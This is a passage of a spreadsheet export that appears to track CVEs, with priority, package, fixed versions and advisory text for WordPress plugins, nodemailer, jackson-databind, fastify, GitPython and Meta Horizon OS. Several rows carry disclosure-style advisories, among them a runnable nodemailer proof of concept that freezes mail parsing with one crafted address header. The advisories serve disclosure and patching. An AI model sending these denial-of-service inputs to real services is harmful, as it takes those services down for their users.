- **CI/CD systems** (Jenkins, GitLab CI, GitHub Actions self-hosted runners, etc.)
  that clone and inspect third-party pull requests — one malicious commit in a PR
  can stall every worker that processes it.
- **Code-hosting or code-review web services** that render commit author information
  — a single crafted push blocks every page render or API response that touches that
  commit's metadata.
- **Security or compliance scanners** that walk repository history across many
  repositories — one crafted object in any repository exhausts a scanner worker.
**Severity of impact:**
A 200 KB author field blocks a process for ~150 seconds per single `.author`
access. When `iter_commits()` or `blame` are used, every commit in a history
traversal can be independently crafted, multiplying the total hang time by the
number of commits processed. There is no confidentiality or integrity impact —
this is a pure availability / resource-exhaustion vulnerability.
---
### Suggested Fix
Replace the vulnerable pattern with one that cannot backtrack catastrophically.
The minimal, behavior-preserving fix is to exclude `&lt;` and `&gt;` from the name
group, removing the ambiguity that forces O(n²) backtracking:
```python
# git/util.py, line 863
# Before (vulnerable):
name_email_regex = re.compile(r"(.*) &lt;(.*?)&gt;")
# After (fixed — identical output for all well-formed input):
name_email_regex = re.compile(r"([^&lt;&gt;]*) &lt;([^&lt;&gt;]*)&gt;")
```
Because the name group can no longer itself contain a `&lt;` character, the engine
has exactly one candidate position to try when a closing `&gt;` is absent — and fails
in O(n) time instead of O(n²). Legitimate actor strings (`Name &lt;email&gt;`) never
contain `&lt;` or `&gt;` in either field, so this change produces identical results for
all valid input.
As defense in depth, independently of the regex fix, bounding the maximum number
of characters GitPython will attempt to parse in an author/committer line (e.g.
rejecting strings longer than 4096 bytes before passing them to any regex) would
further limit the blast radius of any future ReDoS class in this parser.</t>
        </is>
      </c>
      <c r="T208" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87819</t>
        </is>
      </c>
    </row>
    <row r="209">
      <c r="A209" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B209" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C209" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87970</t>
        </is>
      </c>
      <c r="D209" s="5" t="inlineStr"/>
      <c r="E209" s="5" t="inlineStr"/>
      <c r="F209" s="5" t="inlineStr"/>
      <c r="G209" s="5" t="inlineStr"/>
      <c r="H209" s="5" t="inlineStr"/>
      <c r="I209" s="5" t="inlineStr"/>
      <c r="J209" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K209" s="5" t="inlineStr"/>
      <c r="L209" s="5" t="inlineStr"/>
      <c r="M209" s="5" t="inlineStr"/>
      <c r="N209" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O209" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P209" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q209" s="5" t="inlineStr"/>
      <c r="R209" s="5" t="inlineStr"/>
      <c r="S209" s="5" t="inlineStr">
        <is>
          <t>The If-So Dynamic Content  WordPress plugin before 1.10.2 does not escape a request-supplied value before reflecting it in an unauthenticated AJAX response that is served as HTML, allowing attackers to execute arbitrary JavaScript in the browser of a visitor who opens a crafted link.</t>
        </is>
      </c>
      <c r="T209" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87970</t>
        </is>
      </c>
    </row>
    <row r="210">
      <c r="A210" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B210" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C210" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87973</t>
        </is>
      </c>
      <c r="D210" s="5" t="inlineStr"/>
      <c r="E210" s="5" t="inlineStr"/>
      <c r="F210" s="5" t="inlineStr"/>
      <c r="G210" s="5" t="inlineStr"/>
      <c r="H210" s="5" t="inlineStr"/>
      <c r="I210" s="5" t="inlineStr"/>
      <c r="J210" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K210" s="5" t="inlineStr"/>
      <c r="L210" s="5" t="inlineStr"/>
      <c r="M210" s="5" t="inlineStr"/>
      <c r="N210" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O210" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P210" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q210" s="5" t="inlineStr"/>
      <c r="R210" s="5" t="inlineStr"/>
      <c r="S210" s="5" t="inlineStr">
        <is>
          <t>The If-So Dynamic Content  WordPress plugin before 1.10.2 does not sanitize a conversion name before storing it, nor escape it when rendering the analytics page, allowing users with editor-level access to store JavaScript that executes in the session of a higher-privileged user who views that page.</t>
        </is>
      </c>
      <c r="T210" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87973</t>
        </is>
      </c>
    </row>
    <row r="211">
      <c r="A211" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B211" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C211" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89296</t>
        </is>
      </c>
      <c r="D211" s="5" t="inlineStr"/>
      <c r="E211" s="5" t="inlineStr"/>
      <c r="F211" s="5" t="inlineStr"/>
      <c r="G211" s="5" t="inlineStr"/>
      <c r="H211" s="5" t="inlineStr"/>
      <c r="I211" s="5" t="inlineStr"/>
      <c r="J211" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K211" s="5" t="inlineStr"/>
      <c r="L211" s="5" t="inlineStr"/>
      <c r="M211" s="5" t="inlineStr"/>
      <c r="N211" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O211" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P211" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q211" s="5" t="inlineStr"/>
      <c r="R211" s="5" t="inlineStr"/>
      <c r="S211" s="5" t="inlineStr">
        <is>
          <t>The Pro Like Button WordPress plugin before 2.0 does not properly sanitize and escape a parameter before using it in a SQL query, allowing unauthenticated users to perform SQL injection attacks.</t>
        </is>
      </c>
      <c r="T211" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89296</t>
        </is>
      </c>
    </row>
    <row r="212">
      <c r="A212" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B212" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C212" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90776</t>
        </is>
      </c>
      <c r="D212" s="5" t="inlineStr"/>
      <c r="E212" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F212" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G212" s="5" t="inlineStr"/>
      <c r="H212" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I212" s="5" t="inlineStr"/>
      <c r="J212" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K212" s="5" t="inlineStr"/>
      <c r="L212" s="5" t="inlineStr">
        <is>
          <t>npm:nodemailer</t>
        </is>
      </c>
      <c r="M212" s="5" t="inlineStr">
        <is>
          <t>10.0.5</t>
        </is>
      </c>
      <c r="N212" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O212" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P212" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q212" s="5" t="inlineStr"/>
      <c r="R212" s="5" t="inlineStr"/>
      <c r="S212" s="5" t="inlineStr">
        <is>
          <t>### Summary
`nodemailer/lib/addressparser` parses one shape of address in O(n^2) time. A single ~640 KB address value blocks the Node.js event loop for roughly 7 seconds. And it is reachable without auth: mailparser feeds inbound email headers straight into this parser, so one crafted email is enough to stall a service that parses mail.
### Details
The parser builds a single address by accumulating its atoms into one string. When the atoms are separated by RFC 5322 comments, like `a@b(c)@b(c)@b(c)...`, every atom re-joins that same growing string.
The join check in `src/addressparser/index.ts`:
```js
const joins =
    prevToken &amp;&amp;
    prevToken.noBreak &amp;&amp;
    parts.length &amp;&amp;
    (prevToken.value !== ')' || parts[parts.length - 1].slice(-1) === '@' || token.value.charAt(0) === '@');
```
The issue is the order of the last two operands. `parts[parts.length - 1].slice(-1)` runs before the cheap `token.value.charAt(0)`. `slice(-1)` has to flatten the accumulator to read its last character → O(current length) → and that runs on every token → O(n^2) over the whole value. Since `||` is left to right, the cheap `charAt(0)` that would short-circuit never gets the chance.
The chain: long comment-joined address → one growing accumulator → `slice(-1)` re-flattens it on every token → quadratic parse time.
### PoC
Isolated, just the parser (`npm i nodemailer@10.0.3`):
```js
const addressparser = require('nodemailer/lib/addressparser');
const s = Date.now();
addressparser('a' + '@b(c)'.repeat(130000));
console.log(Date.now() - s, 'ms'); // ~7000 ms, blocking
```
End to end through mailparser, the remote path (`npm i mailparser@3.9.24`):
```js
const { simpleParser } = require('mailparser');
(async () =&gt; {
  const to = 'a' + '@b(c)'.repeat(130000);
  const eml = `From: a@b.com\r\nTo: ${to}\r\nSubject: x\r\n\r\nhi\r\n`;
  const s = Date.now();
  await simpleParser(eml);
  console.log(Date.now() - s, 'ms'); // ~7000 ms, blocking
})();
```
Timings measured on 10.0.3:
| Address value | Parse time |
| --- | --- |
| 390 KB | 1.3 s |
| 585 KB | 5.6 s |
| 640 KB | 6.7 s |
| 976 KB | 18 s |
It survives RFC 5322 folding: fold the header at offsets that are a multiple of the atom length and every `)`+`@` junction stays intact, so the payload is a standards-compliant email with lines under 998 octets and still triggers it.
### Impact
Algorithmic-complexity DoS. Node is single threaded, so the block stalls everything else in the process, and a handful of these back to back keeps a service down.
Affected: anything that runs `addressparser` on attacker-controlled input, either the public export directly or address headers built from user input. The unauthenticated remote case is mailparser. 3.9.24 pins nodemailer 10.0.3 and calls the parser on inbound `To`/`From`/`Cc` with no length cap, so any service parsing inbound mail with it can be frozen by a single email.
### Suggested fix
Swap the last two operands so the cheap check runs first:
```js
(prevToken.value !== ')' || token.value.charAt(0) === '@' || parts[parts.length - 1].slice(-1) === '@')
```
Pure boolean commutation, so the parse output is identical. Verified byte for byte on the test inputs, and the full 1276-test suite passes.</t>
        </is>
      </c>
      <c r="T212" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90776</t>
        </is>
      </c>
    </row>
    <row r="213">
      <c r="A213" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B213" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C213" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90972</t>
        </is>
      </c>
      <c r="D213" s="5" t="inlineStr"/>
      <c r="E213" s="5" t="inlineStr"/>
      <c r="F213" s="5" t="inlineStr"/>
      <c r="G213" s="5" t="inlineStr"/>
      <c r="H213" s="5" t="inlineStr"/>
      <c r="I213" s="5" t="inlineStr"/>
      <c r="J213" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K213" s="5" t="inlineStr"/>
      <c r="L213" s="5" t="inlineStr"/>
      <c r="M213" s="5" t="inlineStr"/>
      <c r="N213" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O213" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P213" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q213" s="5" t="inlineStr"/>
      <c r="R213" s="5" t="inlineStr"/>
      <c r="S213" s="5" t="inlineStr">
        <is>
          <t>The WP Fusion Lite  WordPress plugin before 3.48.0 does not perform a capability check on two of its admin AJAX handlers, allowing any authenticated subscriber to read other users' email addresses and to trigger a cross-user CRM re-sync.</t>
        </is>
      </c>
      <c r="T213" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90972</t>
        </is>
      </c>
    </row>
    <row r="214">
      <c r="A214" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B214" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C214" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90974</t>
        </is>
      </c>
      <c r="D214" s="5" t="inlineStr"/>
      <c r="E214" s="5" t="inlineStr"/>
      <c r="F214" s="5" t="inlineStr"/>
      <c r="G214" s="5" t="inlineStr"/>
      <c r="H214" s="5" t="inlineStr"/>
      <c r="I214" s="5" t="inlineStr"/>
      <c r="J214" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K214" s="5" t="inlineStr"/>
      <c r="L214" s="5" t="inlineStr"/>
      <c r="M214" s="5" t="inlineStr"/>
      <c r="N214" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O214" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P214" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q214" s="5" t="inlineStr"/>
      <c r="R214" s="5" t="inlineStr"/>
      <c r="S214" s="5" t="inlineStr">
        <is>
          <t>The WP Fusion Lite  WordPress plugin before 3.48.0 does not require authentication on a settings handler that runs during admin initialization, allowing unauthenticated users to overwrite the site's CRM integration endpoint and credentials, after which synced user data is delivered to an attacker-chosen host.</t>
        </is>
      </c>
      <c r="T214" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90974</t>
        </is>
      </c>
    </row>
    <row r="215">
      <c r="A215" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B215" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C215" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91776</t>
        </is>
      </c>
      <c r="D215" s="5" t="inlineStr"/>
      <c r="E215" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F215" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G215" s="5" t="inlineStr"/>
      <c r="H215" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I215" s="5" t="inlineStr"/>
      <c r="J215" s="5" t="inlineStr">
        <is>
          <t>jackson, jackson-databind, fasterxml, maven</t>
        </is>
      </c>
      <c r="K215" s="5" t="inlineStr"/>
      <c r="L215" s="5" t="inlineStr">
        <is>
          <t>Maven:com.fasterxml.jackson.core:jackson-databind, Maven:tools.jackson.core:jackson-databind</t>
        </is>
      </c>
      <c r="M215" s="5" t="inlineStr">
        <is>
          <t>2.18.11, 2.21.7, 2.22.3, 3.1.7, 3.2.3</t>
        </is>
      </c>
      <c r="N215" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O215" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P215" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q215" s="5" t="inlineStr"/>
      <c r="R215" s="5" t="inlineStr"/>
      <c r="S215" s="5" t="inlineStr">
        <is>
          <t>### Summary
With `@JsonTypeInfo(use = Id.NAME, defaultImpl = ...)`, every distinct unknown
raw type ID selects the same fallback deserializer but is retained as a
separate key in `TypeDeserializerBase._deserializers`. An attacker who can
repeatedly supply new unknown type IDs can grow this process-lifetime cache
without a configured bound.
### Details
The affected path is `TypeDeserializerBase._findDeserializer()`. After an
unknown name-based type ID resolves to the configured fallback/default
implementation, jackson-databind caches the result under the attacker-provided
raw `typeId`. Although all such IDs select the same fallback deserializer, each
new string remains a distinct cache key.
The behavior is runtime-confirmed in jackson-databind 2.22.1 and 3.2.1.
Current 2.22 and 3.2 source branches retained the unbounded `_deserializers`
map and per-raw-ID cache write when rechecked. The earlier affected floor has
not been established, patched versions are: 2.18.11, 2.21.7, 2.22.3, 3.1.7 and 3.2.3.
The vulnerable application must enable name-based polymorphism with a
`defaultImpl` or equivalent fallback, accept attacker-influenced type IDs, and
reuse a long-lived mapper/type deserializer across requests.
Suggested correction: avoid caching each unknown raw ID when every such ID
resolves to the same fallback, use a fallback sentinel, or use an explicitly
bounded concurrency-safe cache. A regression should contrast many distinct
unknown IDs with repetitions of one unknown ID across requests.
### PoC
Configure a polymorphic base type with
`@JsonTypeInfo(use = JsonTypeInfo.Id.NAME, defaultImpl = Fallback.class)` and
deserialize inputs containing unknown type names through the same mapper.
Inspect `TypeDeserializerBase._deserializers` after the run.
On affected 2.x and 3.x versions, 10,000 distinct unknown raw type IDs produce
10,000 retained cache entries even though every input selects the same
fallback deserializer. A matched control that repeats one unknown ID 10,000
times produces one retained entry. This isolates attacker-controlled key
cardinality from ordinary request count.
### Impact
Where the stated polymorphic fallback configuration is exposed to
attacker-influenced type IDs, distinct inputs cause incremental
process-lifetime memory retention and eventual availability pressure or
denial of service. This is not claimed as a single-request allocation spike,
and no fixed bytes-per-ID or time-to-out-of-memory value is asserted. No
confidentiality, integrity, or code-execution impact is claimed.
Requested credit: Daniel Birtwhistle</t>
        </is>
      </c>
      <c r="T215" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91776</t>
        </is>
      </c>
    </row>
    <row r="216">
      <c r="A216" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B216" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C216" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91777</t>
        </is>
      </c>
      <c r="D216" s="5" t="inlineStr"/>
      <c r="E216" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F216" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G216" s="5" t="inlineStr"/>
      <c r="H216" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I216" s="5" t="inlineStr"/>
      <c r="J216" s="5" t="inlineStr">
        <is>
          <t>jackson, jackson-databind, fasterxml, maven</t>
        </is>
      </c>
      <c r="K216" s="5" t="inlineStr"/>
      <c r="L216" s="5" t="inlineStr">
        <is>
          <t>Maven:com.fasterxml.jackson.core:jackson-databind, Maven:tools.jackson.core:jackson-databind</t>
        </is>
      </c>
      <c r="M216" s="5" t="inlineStr">
        <is>
          <t>2.18.11, 2.21.7, 2.22.3, 3.1.7, 3.2.3</t>
        </is>
      </c>
      <c r="N216" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O216" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P216" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q216" s="5" t="inlineStr"/>
      <c r="R216" s="5" t="inlineStr"/>
      <c r="S216" s="5" t="inlineStr">
        <is>
          <t>### Summary
When an `@JsonIdentityInfo` collection or map first creates N unresolved
object-ID references and later resolves the same IDs in reverse order,
jackson-databind scans the remaining pending-reference accumulator for each
resolution. A shallow JSON document whose size grows linearly can therefore
cause quadratic CPU work during deserialization.
### Details
The affected path is forward-reference completion in
`CollectionDeserializer.CollectionReferringAccumulator.resolveForwardReference()`
and the corresponding map implementation. The implementation performs a
linear search of the pending accumulator for every resolved object ID.
The behavior is runtime-confirmed in jackson-databind 2.5.0, 2.22.1, and
3.2.1. Current 2.22 and 3.2 source branches retained the same design when
rechecked. A 2.4.0 control fails closed before successful reverse-order
completion, so 2.5.0 is the conservative runtime-confirmed affected floor.
The patched versions are: 2.18.11, 2.21.7, 2.22.3, 3.1.7 and 3.2.3.
The vulnerable application must deserialize attacker-influenced JSON into an
identity-enabled collection or map. The issue does not require deep nesting or
syntactically unusual JSON.
Suggested correction: replace repeated linear lookup/removal with a keyed
pending-reference structure or another design that provides linear or
amortized-linear completion. A regression should preserve input order,
duplicate-ID behavior, and unresolved-ID errors while bounding reverse-order
resolution work.
### PoC
The proof constructs a shallow collection containing N unresolved
`@JsonIdentityInfo` references followed by definitions of those same IDs in
reverse order. Its ID class counts `equals()` calls, giving a deterministic
work measure rather than a timing-dependent result.
With N=2,000, affected versions perform exactly 2,003,000 ID comparisons. An
equally sized control in which every reference is already resolved performs
zero comparisons in the pending-reference lookup path. The run is bounded to
a 512 MiB JVM. The result demonstrates quadratic growth: approximately
`N * (N + 1) / 2` comparisons, plus fixed setup comparisons.
### Impact
An unauthenticated source that can submit JSON to an application using the
affected identity-enabled collection or map shape can consume quadratic CPU
and exhaust a request-time or worker-capacity budget, causing denial of
service. The application model/configuration prerequisite is material. No
confidentiality, integrity, code-execution, or parser-depth impact is claimed.
Requested credit: Daniel Birtwhistle</t>
        </is>
      </c>
      <c r="T216" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91777</t>
        </is>
      </c>
    </row>
    <row r="217">
      <c r="A217" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B217" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C217" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92081</t>
        </is>
      </c>
      <c r="D217" s="5" t="inlineStr"/>
      <c r="E217" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F217" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G217" s="5" t="inlineStr"/>
      <c r="H217" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I217" s="5" t="inlineStr"/>
      <c r="J217" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K217" s="5" t="inlineStr"/>
      <c r="L217" s="5" t="inlineStr">
        <is>
          <t>npm:fastify</t>
        </is>
      </c>
      <c r="M217" s="5" t="inlineStr">
        <is>
          <t>5.12.5</t>
        </is>
      </c>
      <c r="N217" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O217" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P217" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q217" s="5" t="inlineStr"/>
      <c r="R217" s="5" t="inlineStr"/>
      <c r="S217" s="5" t="inlineStr">
        <is>
          <t>### Impact
`fastify` crashes with an uncaught `ERR_HTTP2_INVALID_CONNECTION_HEADERS` exception when a route that registers a response trailer via `reply.trailer()` is served over HTTP/2. Fastify unconditionally adds the `Transfer-Encoding: chunked` header when a trailer is set, which is forbidden on HTTP/2, so Node.js throws while serializing the response headers. The exception is not caught and becomes an uncaughtException, terminating the Node.js process.
One unauthenticated HTTP/2 request to any route that uses trailers is enough to crash the server, dropping all in-flight requests, and the request can be repeated to keep the process down. Applications are affected only when HTTP/2 is enabled (`http2: true`) and at least one route registers a trailer. HTTP/1.x responses are not affected.
### Patches
Upgrade to `fastify` `5.12.5` or later.
### Workarounds
Avoid registering response trailers with `reply.trailer()` on routes served over HTTP/2 until upgrading.</t>
        </is>
      </c>
      <c r="T217" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92081</t>
        </is>
      </c>
    </row>
    <row r="218">
      <c r="A218" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B218" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C218" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92172</t>
        </is>
      </c>
      <c r="D218" s="5" t="inlineStr"/>
      <c r="E218" s="5" t="inlineStr"/>
      <c r="F218" s="5" t="inlineStr"/>
      <c r="G218" s="5" t="inlineStr"/>
      <c r="H218" s="5" t="inlineStr"/>
      <c r="I218" s="5" t="inlineStr"/>
      <c r="J218" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K218" s="5" t="inlineStr"/>
      <c r="L218" s="5" t="inlineStr"/>
      <c r="M218" s="5" t="inlineStr"/>
      <c r="N218" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O218" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P218" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q218" s="5" t="inlineStr"/>
      <c r="R218" s="5" t="inlineStr"/>
      <c r="S218" s="5" t="inlineStr">
        <is>
          <t>Prior to v66.0.0.733.524 of Meta Horizon OS, OVRMediaService could be induced to send a privileged PendingIntent including a com.oculus.horizon CallerIdentity to an arbitrary application registering for com.oculus.systemactivities.SCREENSHOT via a broadcast receiver. That would allow the application to impersonate the com.oculus.horizon package towards any endpoint within the OS that uses CallerIdentity authentication.</t>
        </is>
      </c>
      <c r="T218" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92172</t>
        </is>
      </c>
    </row>
    <row r="219">
      <c r="A219" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B219" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C219" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92173</t>
        </is>
      </c>
      <c r="D219" s="5" t="inlineStr"/>
      <c r="E219" s="5" t="inlineStr"/>
      <c r="F219" s="5" t="inlineStr"/>
      <c r="G219" s="5" t="inlineStr"/>
      <c r="H219" s="5" t="inlineStr"/>
      <c r="I219" s="5" t="inlineStr"/>
      <c r="J219" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K219" s="5" t="inlineStr"/>
      <c r="L219" s="5" t="inlineStr"/>
      <c r="M219" s="5" t="inlineStr"/>
      <c r="N219" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O219" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P219" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q219" s="5" t="inlineStr"/>
      <c r="R219" s="5" t="inlineStr"/>
      <c r="S219" s="5" t="inlineStr">
        <is>
          <t>Prior to v74.0.0.878.1682 of Meta Horizon OS, MediaSyncJobReceiver could be induced to send a privileged PendingIntent including a com.oculus.vrshell CallerIdentity to an arbitrary application listening via NotificationListenerService. That would allow the application to impersonate the com.oculus.vrshell package, as well as packages signed with the same key, towards any endpoint within the OS that uses CallerIdentity authentication.</t>
        </is>
      </c>
      <c r="T219" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92173</t>
        </is>
      </c>
    </row>
    <row r="220">
      <c r="A220" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B220" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C220" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92412</t>
        </is>
      </c>
      <c r="D220" s="5" t="inlineStr"/>
      <c r="E220" s="5" t="inlineStr"/>
      <c r="F220" s="5" t="inlineStr"/>
      <c r="G220" s="5" t="inlineStr"/>
      <c r="H220" s="5" t="inlineStr"/>
      <c r="I220" s="5" t="inlineStr"/>
      <c r="J220" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K220" s="5" t="inlineStr"/>
      <c r="L220" s="5" t="inlineStr"/>
      <c r="M220" s="5" t="inlineStr"/>
      <c r="N220" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O220" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P220" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q220" s="5" t="inlineStr"/>
      <c r="R220" s="5" t="inlineStr"/>
      <c r="S220" s="5" t="inlineStr">
        <is>
          <t>The Five Star Restaurant Reviews WordPress plugin before 2.3.14 does not properly escape a user-supplied value before outputting it into an HTML tag, allowing unauthenticated attackers to inject arbitrary web script that runs in the browser of anyone tricked into submitting a crafted request, including a logged-in administrator.</t>
        </is>
      </c>
      <c r="T220" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92412</t>
        </is>
      </c>
    </row>
    <row r="221">
      <c r="A221" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B221" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C221" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93981</t>
        </is>
      </c>
      <c r="D221" s="5" t="inlineStr"/>
      <c r="E221" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F221" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G221" s="5" t="inlineStr"/>
      <c r="H221" s="5" t="n">
